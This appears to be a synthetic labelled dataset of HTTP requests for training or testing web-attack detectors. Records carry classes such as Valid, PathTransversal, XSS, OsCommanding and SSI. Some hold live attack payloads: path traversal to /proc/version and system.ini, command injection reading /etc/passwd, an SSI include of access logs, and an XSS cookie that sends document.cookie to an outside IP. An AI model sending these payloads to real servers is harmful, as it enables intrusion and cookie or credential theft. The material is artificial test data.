X-Forwarded-For: 175.103.200.117
X-Serial-Number: 89813
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14854
Start - Id: 45738
class: PathTransversal
GET /oiZU97xx9mAYbcO_iR/jr/TbHwLx/9Wt6.MTCehnh1Z-/kne7Srs7ya7seaukOIue/dsfhke.html?KomservicesZ=71755&s@HPGFw=%5CWINNT%5Csystem.ini&iks1enpfreaToEi=5378&shaaiinn=Sng&lhucsma=epav&6ohaeetHdashe7=eK0n4X%40s HTTP/1.1
Host: 231.187.35.23
Connection: close
Accept: video/quicktime;q=0.6, text/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.7
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 172.160.2.55
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Wed, 31 Dec 08 02:28:10 UTC
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: twlia9=reoe
From: eyebc4et@nriRuu.de
If-Modified-Since: Tue, 29 Sep 09 11:46:58 GMT
If-Unmodified-Since: Sun, 04 Oct 09 05:34:44 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 16:44:49 UTC
Max-Forwards: 1190
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Digest opaque="feamso"
Range: -500252,934-3694
Referer: /etsr/qEge/sc9iee/bdqs6lhr.bin
TE: chunked,trailers
Trailer: Via
User-Agent: irjHyxy2/3.2.5
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: 2.5 www.scoqeWot.shtml
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45738
Start - Id: 18969
class: Valid
GET /XMBISR/sMMD5.php3? HTTP/1.1
Host: www.er8oe.de:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: x6ncrspe-bLmrowa;q=0.9, hloeTr-ou;q=0.3, aex2-eT1;q=0.3
Cache-Control: no-store
Client-ip: 62.249.107.195
Cookie: 7boecuyren=69781;adwze4=EAsma]os;nyntehes0=rg-include
Cookie2: $Version="358"
Date: Sat, 13 May 06 06:58:41 CET
ETag: W/"_p8uqbNU7hHAv59YcgZE"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Fri, 19 Aug 05 06:03:20 GMT
If-Unmodified-Since: Sat, 10 Jan 09 02:34:47 CET
If-Match: "BCG7ZAKQUsBRnRmPBefE"
If-None-Match: "2R@ZjCyGVPwyRMG"
If-Range: Fri, 17 Mar 06 18:13:32 UTC
Max-Forwards: 630
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: NTLM cnllYW05Z3RycE50eXQzYlVhUHBSTnNzb3BwbmJyZGV0d255ZXRzZWdObnRzbDFy
Range: -955518,84-,42-
Referer: http://ileu2ta.com/leOrp/fEK9t.jpg
TE: chunked;q=0.1,deflate;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/8.9 (X11; U; Open BSD i386 7.3; sa-pa; rv:6.3.2) Gecko/87680210
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9204x020
Via: HTTP/0.8 www.ntglg.htm
Transfer-Encoding: compress
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18969
Start - Id: 48281
class: XSS
PUT /nqhmna4vZwW5a93Ms/uXBtFX-zNH/1suo/2nXkcee9dTa/2DlrsCwrt.Jj/eJTTBEyjIh8QOL.mdb? HTTP/1.1
Content-Length: 54
Content-Language: cejwumu
Content-Encoding: compress
Content-MD5: RWw2Y2lwdWhnNTVlenJuQg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Jan 06 21:26:11 GMT
Last-Modified: Thu, 20 Sep 07 21:58:06 UTC
Host: 103.103.154.150
Connection: otle
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, compress, identity;q=0.3
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 194.139.58.173
Cookie: lsanl9sen=04;teiToor2Tho=<xml    id   =    "  X "><a><b>&lt;script    >[window.open('http://91.183.29.131/an.mdb'+document.cookie);]&lt;/script>;</b  ></a ></xml>;sI81rtfrn1Rrft=4
Cookie2: $Version="1"
Date: Tue, 21 Apr 09 09:56:12 UTC
ETag: W/"wz8M1cL@C2mQWF43"
Expect: sthK
If-Modified-Since: Tue, 13 Dec 05 04:46:55 CET
If-Unmodified-Since: Sun, 15 May 05 20:30:39 GMT
If-None-Match: "OjIO3_U8pA3PCVT3"
Authorization: NTLM TmU3ZHRuaXR1bm1rZWxlN3JzYXNidGVpcHNhckhud243djUwaGlibnN3
Referer: http://ebAes.com/ikiChqt.sh
User-Agent: emdsoorh/6.0
UA-OS: WinNT
Transfer-Encoding: compress
Upgrade: 11ssaf/1.6, zAt/4.0, AaEt/1.6, 7sg/3.8

dhN8nns=hVWwRw&K8chc=n$hmlntoaoowp-;&.59IE=5101132

End - Id: 48281
Start - Id: 18822
class: Valid
GET /QuTLc7telnetBN/aBFoPuGwmgb2l9/YGwp-opxT/gntw6Esogsbatteeat/eyntet2uithta5icOp/aJfFxGYExySG/tOEEgs2Volhba/oaE8dhtegrorhiqh.jsp?CLrpy@v3X=sc%3B%2794ri81h7whereri%24e%40&OUka=c13dovShLhndaii&oerle=197577085&5ozlsersf=039106393 HTTP/1.0
Host: www.ioifCsisd.uk:14
Connection: enrtpbt
Accept: */*
Accept-Charset: windows-1251, x-mac-ce;q=0.6
Accept-Encoding: 
Accept-Language: rseh-rh6eamsl;q=0.5
Cache-Control: max-age=01312
Client-ip: 208.166.219.41
Cookie: HTp5etortt=37;ohim=lch3it;mtSrXbAdeg=7cdroptc;@u2a=7iststdin27a'1 eetrr2
Cookie2: $Version="221"
Date: Sat, 10 Dec 05 16:43:10 UTC
ETag: "4886g6T1jjKecgXhjKA3"
Expect: 100-continue
From: ejhs@hewTyhroi.uk
If-Modified-Since: Mon, 12 Jan 09 09:50:39 CET
If-Unmodified-Since: Thu, 19 Jun 08 01:25:41 UTC
If-Match: "NUWFuGMtdVgUBDN1E"
If-None-Match: *
If-Range: Tue, 27 May 08 03:39:43 CET
Max-Forwards: 9
MIME-Version: 9.5
Pragma: xmheyrjj='tdsMjnse'
Proxy-Authorization: Basic T2FvaTpndXR0NA==
Authorization: Votbd tlnbs=eeoij
Range: -0457,62668-,60-4
Referer: /coiEKnjn/eiSme.pl
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 8.2; en-li; rv:3.7.3) Gecko/53484865
UA-CPU: x86
UA-Disp: 941,1451,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4147x8311
Via: qrae/8.4 77.105.222.182, 3.8 www.etwhteht.jpeg
Transfer-Encoding: iyma; teit=heooaa
Upgrade: uEn/4.9, cna/4.3
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18822
Start - Id: 10532
class: Valid
GET /w7vIdyBgFzMe/bd4OH5rtdvi-pHWhgJR/US/sbY/bP2/eKTbi_LS/RxR.asmx?fdsWYst=8103&tegoee3mtleid=8641898&Ltapassthru7tR=972207&ys=eAjaai7hsl&essteie=lrc&mmdajge=o8catf&eoinusdEi=978 HTTP/1.0
Host: 173.60.102.8:80
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.4, x-mac-arabic;q=0.0, koi8-r, x-mac-cyrillic, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: fSel=ehl3
Client-ip: 55.43.222.237
Cookie: Enibs1=5947750441
Cookie2: $Version="412"
Date: Wed, 24 Mar 04 13:25:23 CET
ETag: "u4COHKbMUo4r6lw@a1"
Expect: 100-continue
From: oteu@5ieOnnk.biz
If-Modified-Since: Sun, 14 Aug 05 09:09:43 CET
If-Unmodified-Since: Thu, 09 Feb 06 04:48:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM ZXJlcG5lcWZ3ZW9UeXNhbjNVanl0Z2FucHBpYnNpYWlkZ2puZWJwb2Job1RtZg==
Range: -8188
Referer: /j2nweVr/nswtet.php
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (X11; U; SunOS sun4u 5.3; pn-ci; rv:3.8.5) Gecko/52010005
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4657x757
Via: 7.4 www.ehlEr.shtml:109
Transfer-Encoding: deflate
Upgrade: Nf5rt/6.5, ioEY0/5.3, 30O/5.0, Taonn/0.0, rrsr8/6.3
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 911771913047713
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10532
Start - Id: 46296
class: PathTransversal
GET /i.OUDyq0/h8rptsprbaor/aao4tenhwcsrrrldoije/rEx7v/ys/s50SU9TaXW@kv7-/v7YZ_ai8mJimkvDxu.cgi?diliPy=3649&rmochaW_=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.0
Host: www.nr0lins.it:80
Connection: msirk
Accept: text/plain;q=0.7, video/quicktime
Accept-Charset: windows-1254;q=0.2, euc-tw;q=0.2, windows-1254, x-mac-chinesetrad
Accept-Encoding: gzip
Accept-Language: h0q8Bvt-dhe4foB;q=0.6, he-ie0;q=0.2, tdsiie-t8CI, iE-o
Cache-Control: no-store
Client-ip: 54.146.114.194
Cookie: s8=hNauwilsGlt2aoe
Cookie2: $Version="98"
Date: Thu, 04 Feb 10 20:27:08 UTC
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: tTSp@hlesers0h1.uk
If-Modified-Since: Thu, 13 Dec 07 21:04:21 UTC
If-Unmodified-Since: Thu, 13 Aug 09 03:42:56 UTC
If-Match: *
If-None-Match: "_@Pj9@Yx0T7NfWU60zlA"
If-Range: *
Max-Forwards: 298
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Digest response="ac09Dfddbc6c311F1b7fbca4cD813C1F"
Range: 5-,07-2
Referer: http://www.dnanq.cz/yvro/hkon/sa8s/cewnscu/EtlYYa.swf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (compatible; d8ahqne; Linux i386; jeay; ddbp)
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 5.3 www.gieQt5m.jpg
Transfer-Encoding: compress
Upgrade: 0opl/6.2
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46296
Start - Id: 18758
class: Valid
GET /fv/Q5auQ8@BFcxterm/mUNYrQBK/F0tua_W/xp_E90/i8/bits.jsp?GWAFWN=e1ZiW.yDz&dpEq9=422391&vc3r3w6e1awom6=18235373&vTugees2=82&ssCtrkn=tDH&ospacst=3eddVRdtseE8s&odeottts=b+&JsHZ0dQjUS=EiF&2D1VGmOKJ=evAecsewetsoclhrns&etoieut0da=7015&SNautoexecsnc_m6mJservices=g&lkrwdchildN=nsry&hswatWnpssIssdL=6ze%26processing-instructione+ha%5B+bg6n+npi&thr4nt=4 HTTP/1.0
Host: www.eianaEoaht.net
Connection: m8edars
Accept: */*;q=0.7
Accept-Charset: windows-874, ks_c_5601-1987, macintosh, x-mac-greek;q=0.0, windows-1255
Accept-Encoding: 
Accept-Language: d-zlfia;q=0.3
Cache-Control: no-transform
Client-ip: 119.221.206.231
Cookie: njrsafaoDs=n;1at=9jeoeobwgE'v;auahpRtuiH5Itt=5579;nrtykRw6etf7x=f3bneeen;trrSyyidtsfiu=9
Cookie2: $Version="6"
Date: Thu, 15 Mar 07 03:33:13 GMT
ETag: W/"7gzlFUv03erW63B-VC4"
Expect: rtnpIya=nirrWdcs;hlOht=Hm0e
From: D5astys@snuabwthe.cz
If-Modified-Since: Thu, 08 Jun 06 23:00:19 CET
If-Unmodified-Since: Wed, 21 Feb 07 13:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Apr 09 15:29:09 GMT
Max-Forwards: 5
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM YWRzaWVhZWxmbXRvZWVlandzUWdkalJtdG9pcXRncml2
Range: -062629
Referer: /tcIHo/cbuaobeh/wCre2ee/sTmfe0te.asp
TE: trailers,gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 1.5; As-t8; rv:4.1.8) Gecko/75701842
UA-CPU: x86
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: 7.1 www.rjhmw.css
Transfer-Encoding: identity
Upgrade: uk7m/5.7, hswlu/4.6
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18758
Start - Id: 45188
class: PathTransversal
GET /./? HTTP/1.1
Host: 13.77.116.184
Connection: 0brooot
Accept: text/*, video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Wed, 06 Jul 05 01:33:53 UTC
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Fri, 12 Oct 07 06:38:05 CET
If-Unmodified-Since: Sun, 03 Dec 06 10:18:40 GMT
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Fri, 16 Jul 04 05:10:34 UTC
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: -8661
Referer: /icvSssOh/4tfbLij4/jnz2nso/s3koeo.mdb
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/4.5 (compatible; MSIE 9.4; SunOS sun4u; g3a4uczlp; lohtsteadc)
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: eut1e/5.9 198.116.243.21
Transfer-Encoding: identity
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45188
Start - Id: 43592
class: OsCommanding
GET /d7@D6r_U/hq8ulDLq9/qBf8EBt_q3YBfN/oszvniOrxngqntalsro/B9YW/c-B9edp/stta6g5FIom6d/U-metaM5Ial/d9ems.gif?6e=+1&avlidtoue=soehr&vbscript2N.=197&iEnse1titsyrcrh=991&simEx=124688201&Enidnolz=%7Ccat+%2Fetc%2Fpasswd++%7C&oaSaszw=Leoc&upitrrq4e1ouoi=uatcPaoatiSge&ohdiielijn=+h5neaB84 HTTP/1.1
Host: 157.69.139.122
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.2, deflate, deflate, deflate
Accept-Language: ovrq-ckiev;q=0.9, aneet-arxi, 5dsidae-7ao, 8nx-Sl0eELr;q=0.2, ShpjNj-iou
Cache-Control: max-stale=6
Client-ip: 128.51.142.118
Cookie: uyn5i2se5oi=auet
Cookie2: $Version="7"
Date: Wed, 03 Jun 09 07:47:49 GMT
ETag: "4k2b-aFzaYNwu5THDb"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 11 Apr 09 05:01:29 GMT
If-Unmodified-Since: Thu, 10 Dec 09 16:17:30 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Fri, 11 Nov 05 02:54:53 UTC
Max-Forwards: 6330
MIME-Version: 6.7
Pragma: o='arb'
Proxy-Authorization: gJons gtoaie=6vpernh8
Authorization: Digest nc=57d1595b
Range: 0756-,6170-,99043-471
Referer: /hz7a/ieeh/eskT2pe/7rssIeoT/t8lndir.nsf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: nz@KdL http://www.Gty2htrl.de
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
X-Forwarded-For: 142.88.116.166
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43592
Start - Id: 39637
class: SSI
GET /4MIYboot.iniikHJHkQ/tlrXal4a/ect7nt4t4sei.html?FgM.puK=5hah+irrq&vs=%3C%21--+++++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E HTTP/1.0
Host: www.eibfrBett.uk
Connection: coOi2h
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: R-hNi, asudt-he;q=0.1, tatshd-aA;q=0.8, oTep-m2m, bwi-AatQm;q=0.5
Cache-Control: min-fresh=799
Client-ip: 96.129.208.142
Cookie: 2bgsound3Ppc0lRx.=rr;kiosOyvDepog=Af77akm
Cookie2: $Version="2"
Date: Wed, 02 Dec 09 01:16:47 UTC
ETag: W/"vYrhlBgxRcANvEX21"
Expect: irarnre
From: ae07on@oist3.org
If-Modified-Since: Mon, 08 Jan 07 24:32:16 GMT
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: "OfXGs30@Oz_dDpXyUh_H"
If-Range: Tue, 15 May 07 15:09:22 GMT
Max-Forwards: 91
MIME-Version: 1.8
Pragma: Faefs='tla0u'
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: teysyo tsncrnhq=h2rcm3Yd
Range: -3
Referer: http://www.ssnaoo.fr/nsta/wtint4s/ust3t/ttctjllc/enrsQwjn.bin
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.9 (Windows; U; WinNT 5.8; mm-4s; rv:1.0.2) Gecko/87407987
UA-CPU: PowerPC
UA-Disp: 470,8277,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39637
Start - Id: 22270
class: Valid
GET /9PTICaC5GJEUrtGkdeCV/wp-usr.swf? HTTP/1.0
Host: www.jkOorNtttq.net
Connection: close
Accept: video/*, text/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=50795
Client-ip: 91.232.99.93
Cookie: rI5aiuwtnA1tdtr=semod;cw=658898382;npelbleeo=12;ynrcus=4;wh5eed=Tud;3vjaGcYp6L=39161
Cookie2: $Version="6"
Date: Mon, 11 May 09 04:32:22 CET
ETag: "s1ClwvcWKpAtVtLB"
Expect: bu3tirb
From: ucnlr@iidsSs.com
If-Modified-Since: Tue, 26 Oct 04 03:45:13 UTC
If-Unmodified-Since: Wed, 14 Apr 04 23:00:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Feb 05 14:37:15 GMT
Max-Forwards: 27
MIME-Version: 9.9
Pragma: ve='igt'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://Fgi8he.org/solt1orn/naghniat/r1tfe/sEaetih.jpeg
Range: 187831-,-728581,-573791
Referer: http://www.srsmat3.st/nesooztx/punxq/sr7po.css
TE: trailers
Trailer: From
User-Agent: jlosQkndrnrIte
UA-CPU: MIPS
UA-Disp: 0876,9361,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8023x069
Via: FTP/4.0 96.44.154.230, 0.4 www.2nps3.js, 0.4 www.Axc7a0.html
Transfer-Encoding: deflate
Upgrade: aBt/9.8, onsAO/9.9, irn/1.6, yai/6.9, aorGd6/4.8
Warning: 967 240.225.47.66:3503 "oene7icne5sdt6" 
X-Forwarded-For: 120.68.205.141
X-Serial-Number: 35178476793
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22270
Start - Id: 16218
class: Valid
GET /3sclyo/8c8-TZxrW0dC_4M.CyS6/rSQ/ufeWzb5j6V@/stdn/winsertAGhF4MoshutdownXRWj.jpeg? HTTP/1.1
Host: 252.198.89.189:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, iso-8859-9, x-mac-korean;q=0.2, gb2312;q=0.6, euc-jp;q=0.2
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: max-age=08079
Client-ip: 212.211.65.100
Cookie: odnFu=eElink
Cookie2: $Version="3"
Date: Thu, 06 Jan 05 22:55:59 GMT
ETag: W/"-YffN6UEXpgSmLqqvJa"
Expect: 100-continue
From: ayzaa@q0mhuylt.cz
If-Modified-Since: Mon, 14 Feb 05 05:57:13 UTC
If-Unmodified-Since: Tue, 10 Jan 06 13:23:39 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Oct 09 20:40:35 CET
Max-Forwards: 7
MIME-Version: 9.8
Pragma: inm6fhnu='oaj'
Proxy-Authorization: H6fasy hpdssh=vurise
Authorization: eoace iijnnlf0=4drcai2
Range: -1,640-,-33570
Referer: /cniep/ecofhea/otmlsfd.bin
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.2 (X11; U; Linux i586 6.4; im-ne; rv:2.0.0) Gecko/37438197
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7316x082
Via: w7tao/7.2 www.oaoe7Of.tiff
Transfer-Encoding: compress
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 57.123.138.159
X-Serial-Number: 1816915028
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16218
Start - Id: 12995
class: Valid
GET /e2f/hB66Y/wSDutFGF1IGJG94_Xik9.aspx?_-execaccept=tnxsqracoUbe HTTP/1.0
Host: www.5l30zcg.gov
Connection: 2yea
Accept: */*
Accept-Charset: cp-932;q=0.8
Accept-Encoding: 
Accept-Language: eh-letl3;q=0.2
Cache-Control: uiro='8et'
Client-ip: 196.193.252.212
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="345"
Date: Sun, 08 Oct 06 21:02:03 UTC
ETag: "OUG7X13QeuRXor3R6"
Expect: Xeaushv
From: picsvpm@izhyigm.biz
If-Modified-Since: Fri, 05 Dec 08 08:42:12 UTC
If-Unmodified-Since: Wed, 01 Feb 06 01:10:08 GMT
If-Match: *
If-None-Match: "-NY-WuxuVJJMPqqbFv_"
If-Range: Thu, 04 Mar 04 13:33:06 UTC
Max-Forwards: 1
MIME-Version: 8.0
Pragma: hnat=E
Proxy-Authorization: Digest nonce
Authorization: Teaih ewwres=9fntivgk
Range: 459-
Referer: /i8el1n/udoheen.swf
TE: deflate;q=0.5,trailers
Trailer: Range
User-Agent: Ntureh (qKnva@; tU-s9Pc1; ewd0R-znWV; eNrYnh)
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 011x9947
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: gzip
Upgrade: eir/2.5, te5s/6.4
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 48761623
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12995
Start - Id: 10768
class: Valid
GET /ocaijl/oTXVcSmywK7I/7exec0hme/XA5ubetween-/gCM_kLpPG51gmV8SgD/uxtermW3qtV_.j/@wopenL6TkbetweenGUdP/winntfmOGP/6bEJxtermlNz_gVF/thrsjt2D/r5rjqvV.html? HTTP/1.0
Host: www.Eefaede.gov
Connection: keep-alive
Accept: image/*;q=0.0, text/*;q=0.9, image/*;q=0.4
Accept-Charset: cp-932, x-mac-turkish;q=0.1, euc-tw
Accept-Encoding: 
Accept-Language: t-sase, ttehh-uolsdme;q=0.1, itosmIb-r;q=0.7
Cache-Control: no-store
Client-ip: 131.88.164.77
Cookie: dl0psm2Etbyr=u;oe0ihDreSx=&-ei;sxn=hhuei1neQswgetta
Cookie2: $Version="82"
Date: Sun, 16 Jul 06 09:25:58 CET
ETag: "BXgx4iZevSqj21K"
Expect: 100-continue
From: Ionmrq@m5vte.org
If-Modified-Since: Sun, 01 Mar 09 23:26:25 CET
If-Unmodified-Since: Thu, 31 Mar 05 11:56:49 GMT
If-Match: "rdOgiZWnitVK3x-x_0k"
If-None-Match: *
If-Range: Tue, 03 Jun 08 23:18:18 UTC
Max-Forwards: 9
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: p5tof ehije8e=huera
Authorization: Ssn8zn sjhnwf=pEoz
Range: -301,379816-249242
Referer: http://www.eisjteo.com/Tkvw/rnrkum.conf
TE: deflate,trailers,deflate
Trailer: TE
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.5; no-ej; rv:6.3.0) Gecko/21123953
UA-CPU: StrongARM
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 713x311
Via: 5.3 253.91.164.57:57, FTP/0.9 www.stfc.htm
Transfer-Encoding: 3teu; tgzfeti=Ylrin
Upgrade: eals/5.6, Opar/6.7, dfn0gy/4.8
Warning: 415 www.rzntu.js:55645 "amqxeesuQ" 
X-Forwarded-For: 79.28.111.137
X-Serial-Number: 20081399202583865
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10768
Start - Id: 17387
class: Valid
GET /p5tWG7t3oJ2@r.php4?n9=%5Bj&8mriNodadyilor=xl4P22FTky6&eztVruor3Htn6=xaaaoe1f%3Br&peod7sxeDankni=5&kryoalcetybos=venwwielpd HTTP/1.0
Host: www.slctRnsl.gov
Connection: keep-alive
Accept: audio/x-wav, audio/*;q=0.6, audio/x-wav;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3, identity
Accept-Language: R4nio-a3;q=0.3, eeNnetn-jzsut, risefrr-o1ac;q=0.4, haoi-dprsAeb, 2fxl-acoduulo;q=0.8
Cache-Control: min-fresh=6150
Client-ip: 55.91.205.173
Cookie: 7nm=asesre;wmiosrsiO=2644;zam9lek=nt;yTayen=7ur
Cookie2: $Version="80"
Date: Mon, 14 Jul 08 02:04:02 CET
ETag: "gPzho-dhAQlFxoSl-O90"
Expect: 100-continue
From: eoioeyi@guvv.be
If-Modified-Since: Mon, 02 Jul 07 24:25:17 UTC
If-Unmodified-Since: Tue, 15 Dec 09 04:58:36 CET
If-Match: "sncZ4hXhvIIcDfMrI"
If-None-Match: *
If-Range: Tue, 22 Jul 08 20:50:43 CET
Max-Forwards: 3
MIME-Version: 6.8
Pragma: enio2='bll'
Proxy-Authorization: Basic bG9zbmU6dHB1aVNvNA==
Authorization: Basic ZXJ0ZGllV2Y6a3F6aA==
Range: 81-,2781-
Referer: /N74hn/aIwdl9pe/a3etHc.msf
TE: gzip,deflate;q=0.3,chunked
Trailer: If-Unmodified-Since
User-Agent: morpeiuo/9.5.4.2
UA-CPU: MIPS
